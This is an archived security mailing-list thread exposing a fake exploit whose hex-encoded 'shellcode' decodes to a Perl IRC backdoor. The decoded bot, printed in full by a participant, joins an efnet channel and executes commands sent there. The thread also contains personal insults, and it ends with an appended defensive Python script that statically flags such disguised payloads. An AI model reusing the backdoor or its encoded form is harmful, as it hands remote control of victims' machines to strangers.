Message-ID: <CAFMAuHq5YkYYgL4bq21aCjFrOK5eaHnZ6Ls8edQV1A5zrfWRcw@mail.gmail.com>
Date: Fri, 28 Oct 2011 11:48:15 +0200
From: doc mombasa <doc.mombasa@...il.com>
To: GloW - XD <doomxd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: I know its old, but what the heck does this do... (exposing a tool...)
jesus you are not fully there are you?
this "exploit" was just another fake exploit to take the piss on people
there has been tons of them
so good work at digging up an 8 year old joke no one gives a shit about
you're ranting even worse than n3td3v
2011/10/26 GloW - XD <doomxd@...il.com>
> Ok... am awake now and, have some infos yes...
> Interesting bot.
> Seems i have spoken with some people regarding this and the release. Here is
> a brief outline of how it goes.
> Attacks were done on some people who run shells on efnet irc network, so in
> order to catch the *morons* or, ppl who did launch the DoS
> would then be showing up in #darknet channel, and responds to the ops or,
> channel.
> I ran this and saw it still clobbers smb, and still uses the original bug,
> so d0s will still occur,
> however, it will try and join, i believe that's a dead link in there now
> but, would have tried to join an efnet node..
> Speaking with #darknet owners:
>
> > ok dude why was this released...
> msg> we released the original working code. this started a massive war of
> the kids,
> unfortunately many innocent boxes got raped, so we decided to play a small
> game, and make a *version plus*
> or so so say.
> > very interesting concept, new, intuitive to use perl, as many people
> would decrypt it tho, using perl -e , isn't this a little harsh...
> msg> they run it, it won't affect them, at all, they will see the connection
> and kill it, and since no D0s is launched, it won't really work
> > hrmm well, it is a good idea, to capture the arseholes who wish to ddos
> etc... i see why it is done but also, can i ask you
> do you know what a darknet is ? because, you seem to not see that, ppl
> would assume this channel is all about 'darknets'..
> instead it is only capturing people who will launch a DoS tool, and many
> people seem 'idle'.
> msg> we don't control who comes here, nor care, but when it comes to d0s, we
> don't screw about. hit us, and we will hit back.
> Also, why are you asking me about code which was made in 2003 or so :P~
> > ahh well, that's purely because, i expose any BS like this code is, but, i
> will not mark this as bullshit.
> it is horseshit :P and, i respect that you're at the least, using some
> shitty tool like d0s, instead of faking an exploit.
> I will class this not as exposed at all, instead, it will serve as some
> form of tuition to skids.
> Run the tools you cannot read, and, expect even some shitty perlbot to
> pop out. I like it!
> I will class this as exposed but intuitive, thank you for your time.
> msg> i don't care what you mark it as, the rule is simple, do not run d0s
> ./appz ! Have a nice day!
> > Again thanks for your time, i will keep the nickname anonymous... you're
> not classed as a now-owner , so i guess it is more wtf this was all about,
> even when you wrote the .c or, as i know it,
> was 'brain' or some dude... either way, i tip the black hat to you but
> also warn you not always will them kids be happy to be owned by shitty .c ,
> so, I'd be expecting more problems from release, than not
> This is your problem, and, i respect your views, just get some knowledge
> into you about wtf a 'darknet' is pronto!
> Also have a nice day.
>
> ..........................................
> Ok so, basically the talk i had with a now non op of channel but,
> interesting coz, it is actually very popular, yet only a few actually
> realise that they're being linked now to a darknet technology app etc, and
> they're finding that maybe they should have kept those old ops :P or maybe
> they could just release 'ipv6killer.c' and just fix some
> settings.. either way, it is kinda unique, and strange why there was no chat
> about this app, until now.. nothing
> solid which shows this perl, and admittedly, that's a VERY clever bot for
> such a small piece of code.
> Anyhow, thanks to those who found this interesting, sorry to those who
> didn't :)
> I think i might hang in darknet channel and wait for a few "Hi im a lamer!"
> etc... rofl.
> cheers, and cheers to #darknet for at least not faking the tool completely,
> and, using a skeleton and structure of their OWN code.
> Winnuke2000.c is NOT backdoored, and IS theirs also, I think they regret
> releasing it now but, this was 2003, and, as i said, i will try and expose
> anything i find strange, however, from now on, I'll be marking exposes under
> noise, as they're non disclosures.
> xd
>
>
>
>
>
> On 26 October 2011 16:55, Flavio do Carmo Junior <carmo.flavio@...il.com> wrote:
>
>> sounds really useful...
>>
>> [waKKu@...5n ~]$ python -c 'hellcode=(
>> "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
>> >
>> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
>> >
>> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
>> >
>> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
>> >
>> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
>> >
>> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
>> >
>> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
>> >
>> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
>> >
>> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
>> >
>> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
>> >
>> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
>> >
>> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
>> >
>> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
>> >
>> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
>> >
>> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
>> >
>> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
>> >
>> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
>> >
>> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
>> >
>> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
>> >
>> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
>> >
>> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
>> >
>> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
>> >
>> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
>> >
>> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
>> >
>> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
>> >
>> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
>> >
>> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
>> >
>> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
>> >
>> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
>> >
>> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
>> >
>> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
>> >
>> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
>> >
>> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
>> >
>> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
>> >
>> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
>> >
>> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
>> >
>> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
>> >
>> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
>> >
>> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
>> >
>> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
>> >
>> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
>> >
>> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
>> > "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print
>> hellcode;'
>> #!/usr/bin/perl
>> $chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl
>> ";$SIG{TERM}={};exit
>> if fork;use IO::Socket;$sock =
>> IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
>> +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
>> /){$mode=$1;last if
>> $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
>> $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
>> ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
>> type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
>> $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
>> :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
>> $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
>> 2>/dev/null;/tmp/hi
>> [waKKu@...5n ~]$
>>
>> print hellcode[764:];'
>> /tmp/hi
>>
>>
>> --
>>
>> On 26 October 2011 13:49, xD 0x41 <secn3t@...il.com> wrote:
>> > yer ofc... anyhow, ignoring you now...
>> >
>> > you obv think you're some leet troll, you're not, you're ONLY a TROLL :)
>> > have a nice day or is that
>> >
>> > *Goplamamamama Ignananayu*
>> >
>> > forget the jedi okay, you gotta brush up on ya troll trash talk!
>> > bah hahaha.
>> > fool
>> > xd
>> >
>> >
>> > On 26 October 2011 13:44, Antony widmal <antony.widmal@...il.com> wrote:
>> >>
>> >> Using your smartphone while flipping burgers can be dangerous pandawan.
>> >> Moreover if you work at burger king.
>> >>
>> >>
>> >>
>> >> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>
>> >>> h the idiot who thinks I'm laurelai... meh , you're a fool yourself just for
>> >>> even thinking that much :s
>> >>> you're but an echo on the list, which, does not echo the rest of it, which is
>> >>> a good place to be.
>> >>> unfortunately, you're one of the few who should just be blocked, for making
>> >>> absolutely nothing but abusive crap...
>> >>> you're an idiot. not me.
>> >>> i don't run things, why, have you run it ?
>> >>> Is it good ?
>> >>> hehe... maybe it is!
>> >>> i guess if he's using it...well...
>> >>> *sic*
>> >>>
>> >>>
>> >>>
>> >>> On 26 October 2011 13:21, Antony widmal <antony.widmal@...il.com> wrote:
>> >>>>
>> >>>> Do yourself a favor and run that code dumbass.
>> >>>>
>> >>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>>>
>> >>>>> I use darknets to help me,
>> >>>>> they send me the info i need.
>> >>>>> simple answer to simple question.
>> >>>>> look them up, they may oneday protect you, also.
>> >>>>>
>> >>>>>
>> >>>>> On 26 October 2011 13:15, adam <adam@...sy.net> wrote:
>> >>>>>>
>> >>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
>> >>>>>> claims to be a remote kernel root exploit)
>> >>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
>> >>>>>> similar code, claims to be an IIS exploit)
>> >>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
>> >>>>>> thread, code is mentioned though)
>> >>>>>> I'm sure there's more, but this kinda reminds me of that leaked
>> >>>>>> "private exploit" on pastebin a few weeks back (you know, the one that was
>> >>>>>> nice enough to create a _local_ root account), and insisted that it was
>> >>>>>> private private private and specifically said NOT to leak it.
>> >>>>>> I am curious as to how you're so certain that it's on "many many
>> >>>>>> boxes" yet know next to nothing about it.
>> >>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>>>>>
>> >>>>>>> Hello List,
>> >>>>>>> I'd like people to also, like this thread asks, to pls give some
>> >>>>>>> opinion, other than mine.. which, i am yet to make;
>> >>>>>>>
>> >>>>>>> http://www.hackerthreads.org/Topic-5973
>> >>>>>>>
>> >>>>>>> Please look at this .c code on here, if you wish, and tell me, why
>> >>>>>>> A. It is still in circulation, seemingly, on MANY MANY boxes....
>> >>>>>>> B. people still seem to try keep it private :s
>> >>>>>>>
>> >>>>>>> This morning, a friend from webhostingtalk.com, asked me to take a
>> >>>>>>> look.
>> >>>>>>> I have and, i can only so far say, once i decrypt the shellcode, I'll
>> >>>>>>> know a bit more..
>> >>>>>>> although, i remember this thing, and, so many people were after it,
>> >>>>>>> people were paying for it, this is first time i have seen it actually
>> >>>>>>> disclosed tho,
>> >>>>>>> admittedly only looked today.
>> >>>>>>> If skiddies are using it to ddos things, I want to make sure i can
>> >>>>>>> expose it, and kill the threats.
>> >>>>>>> thank you.
>> >>>>>>> xd .// exposing bullshit as i ride!
>> >>>>>>>
>> >>>>>>>
>> >>>>>>> _______________________________________________
>> >>>>>>> Full-Disclosure - We believe in it.
>> >>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>>>>
>> >>>>>
>> >>>>>
>> >>>>
>> >>>
>> >>
>> >
>> >
>> >
>>
>>
>>
>> --
>> --
>> Best regards,
>>
>> Flávio do Carmo Júnior
>> Sydney/NSW
>> http://au.linkedin.com/in/carmoflavio/en
>> http://0xcd80.wordpress.com
>>
>>
>
>
>
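The static decode shown in the quoted post, generalized as an added example (not code from the thread or its participants): pull the \xNN string literals out of a C file without compiling or running it, and flag a "shellcode" buffer that is really printable script text. The sample source, the function names and the 0.95 threshold are assumptions made for illustration; the indicator strings are taken from the decoded script quoted above.

```python
import re

# Constructed sample input: one "shellcode" array that is really a script,
# and one array of harmless non-printable bytes for contrast.
SAMPLE_C = r'''
char shellcode[] =            /* constructed, decodes to a two-line sh script */
  "\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
  "\x65\x63\x68\x6f\x20\x68\x69\x0a";
char filler[] = "\x90\x90\x90\x31\xc0\x31\xdb\xeb\xfe";
'''

HEX_RUN = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')

# Strings that belong in a script, not in machine code (from the decoded bot).
INDICATORS = [b"#!/", b"IO::Socket", b"PRIVMSG", b"NICK ", b"JOIN ",
              b"chmod +x", b"/tmp/", b"`"]


def extract_buffers(c_source):
    """Return one bytes object per C statement that contains \\xNN literals."""
    no_comments = re.sub(r"/\*.*?\*/", "", c_source, flags=re.S)
    buffers = []
    for stmt in no_comments.split(";"):
        runs = HEX_RUN.findall(stmt)          # adjacent literals concatenate in C
        if runs:
            buffers.append(bytes.fromhex("".join(runs).replace("\\x", "")))
    return buffers


def triage(buf):
    """Score a decoded buffer: mostly printable plus script markers = not opcodes."""
    printable = sum(1 for b in buf if 32 <= b < 127 or b in (9, 10, 13))
    ratio = round(printable / len(buf), 2)
    hits = [i.decode() for i in INDICATORS if i in buf]
    return {"length": len(buf), "printable_ratio": ratio, "indicators": hits,
            "looks_like_script": ratio > 0.95 and bool(hits)}


if __name__ == "__main__":
    for n, buf in enumerate(extract_buffers(SAMPLE_C)):
        print(n, triage(buf))
        if triage(buf)["looks_like_script"]:
            print(buf.decode("ascii", "replace"))   # read it, never execute it
```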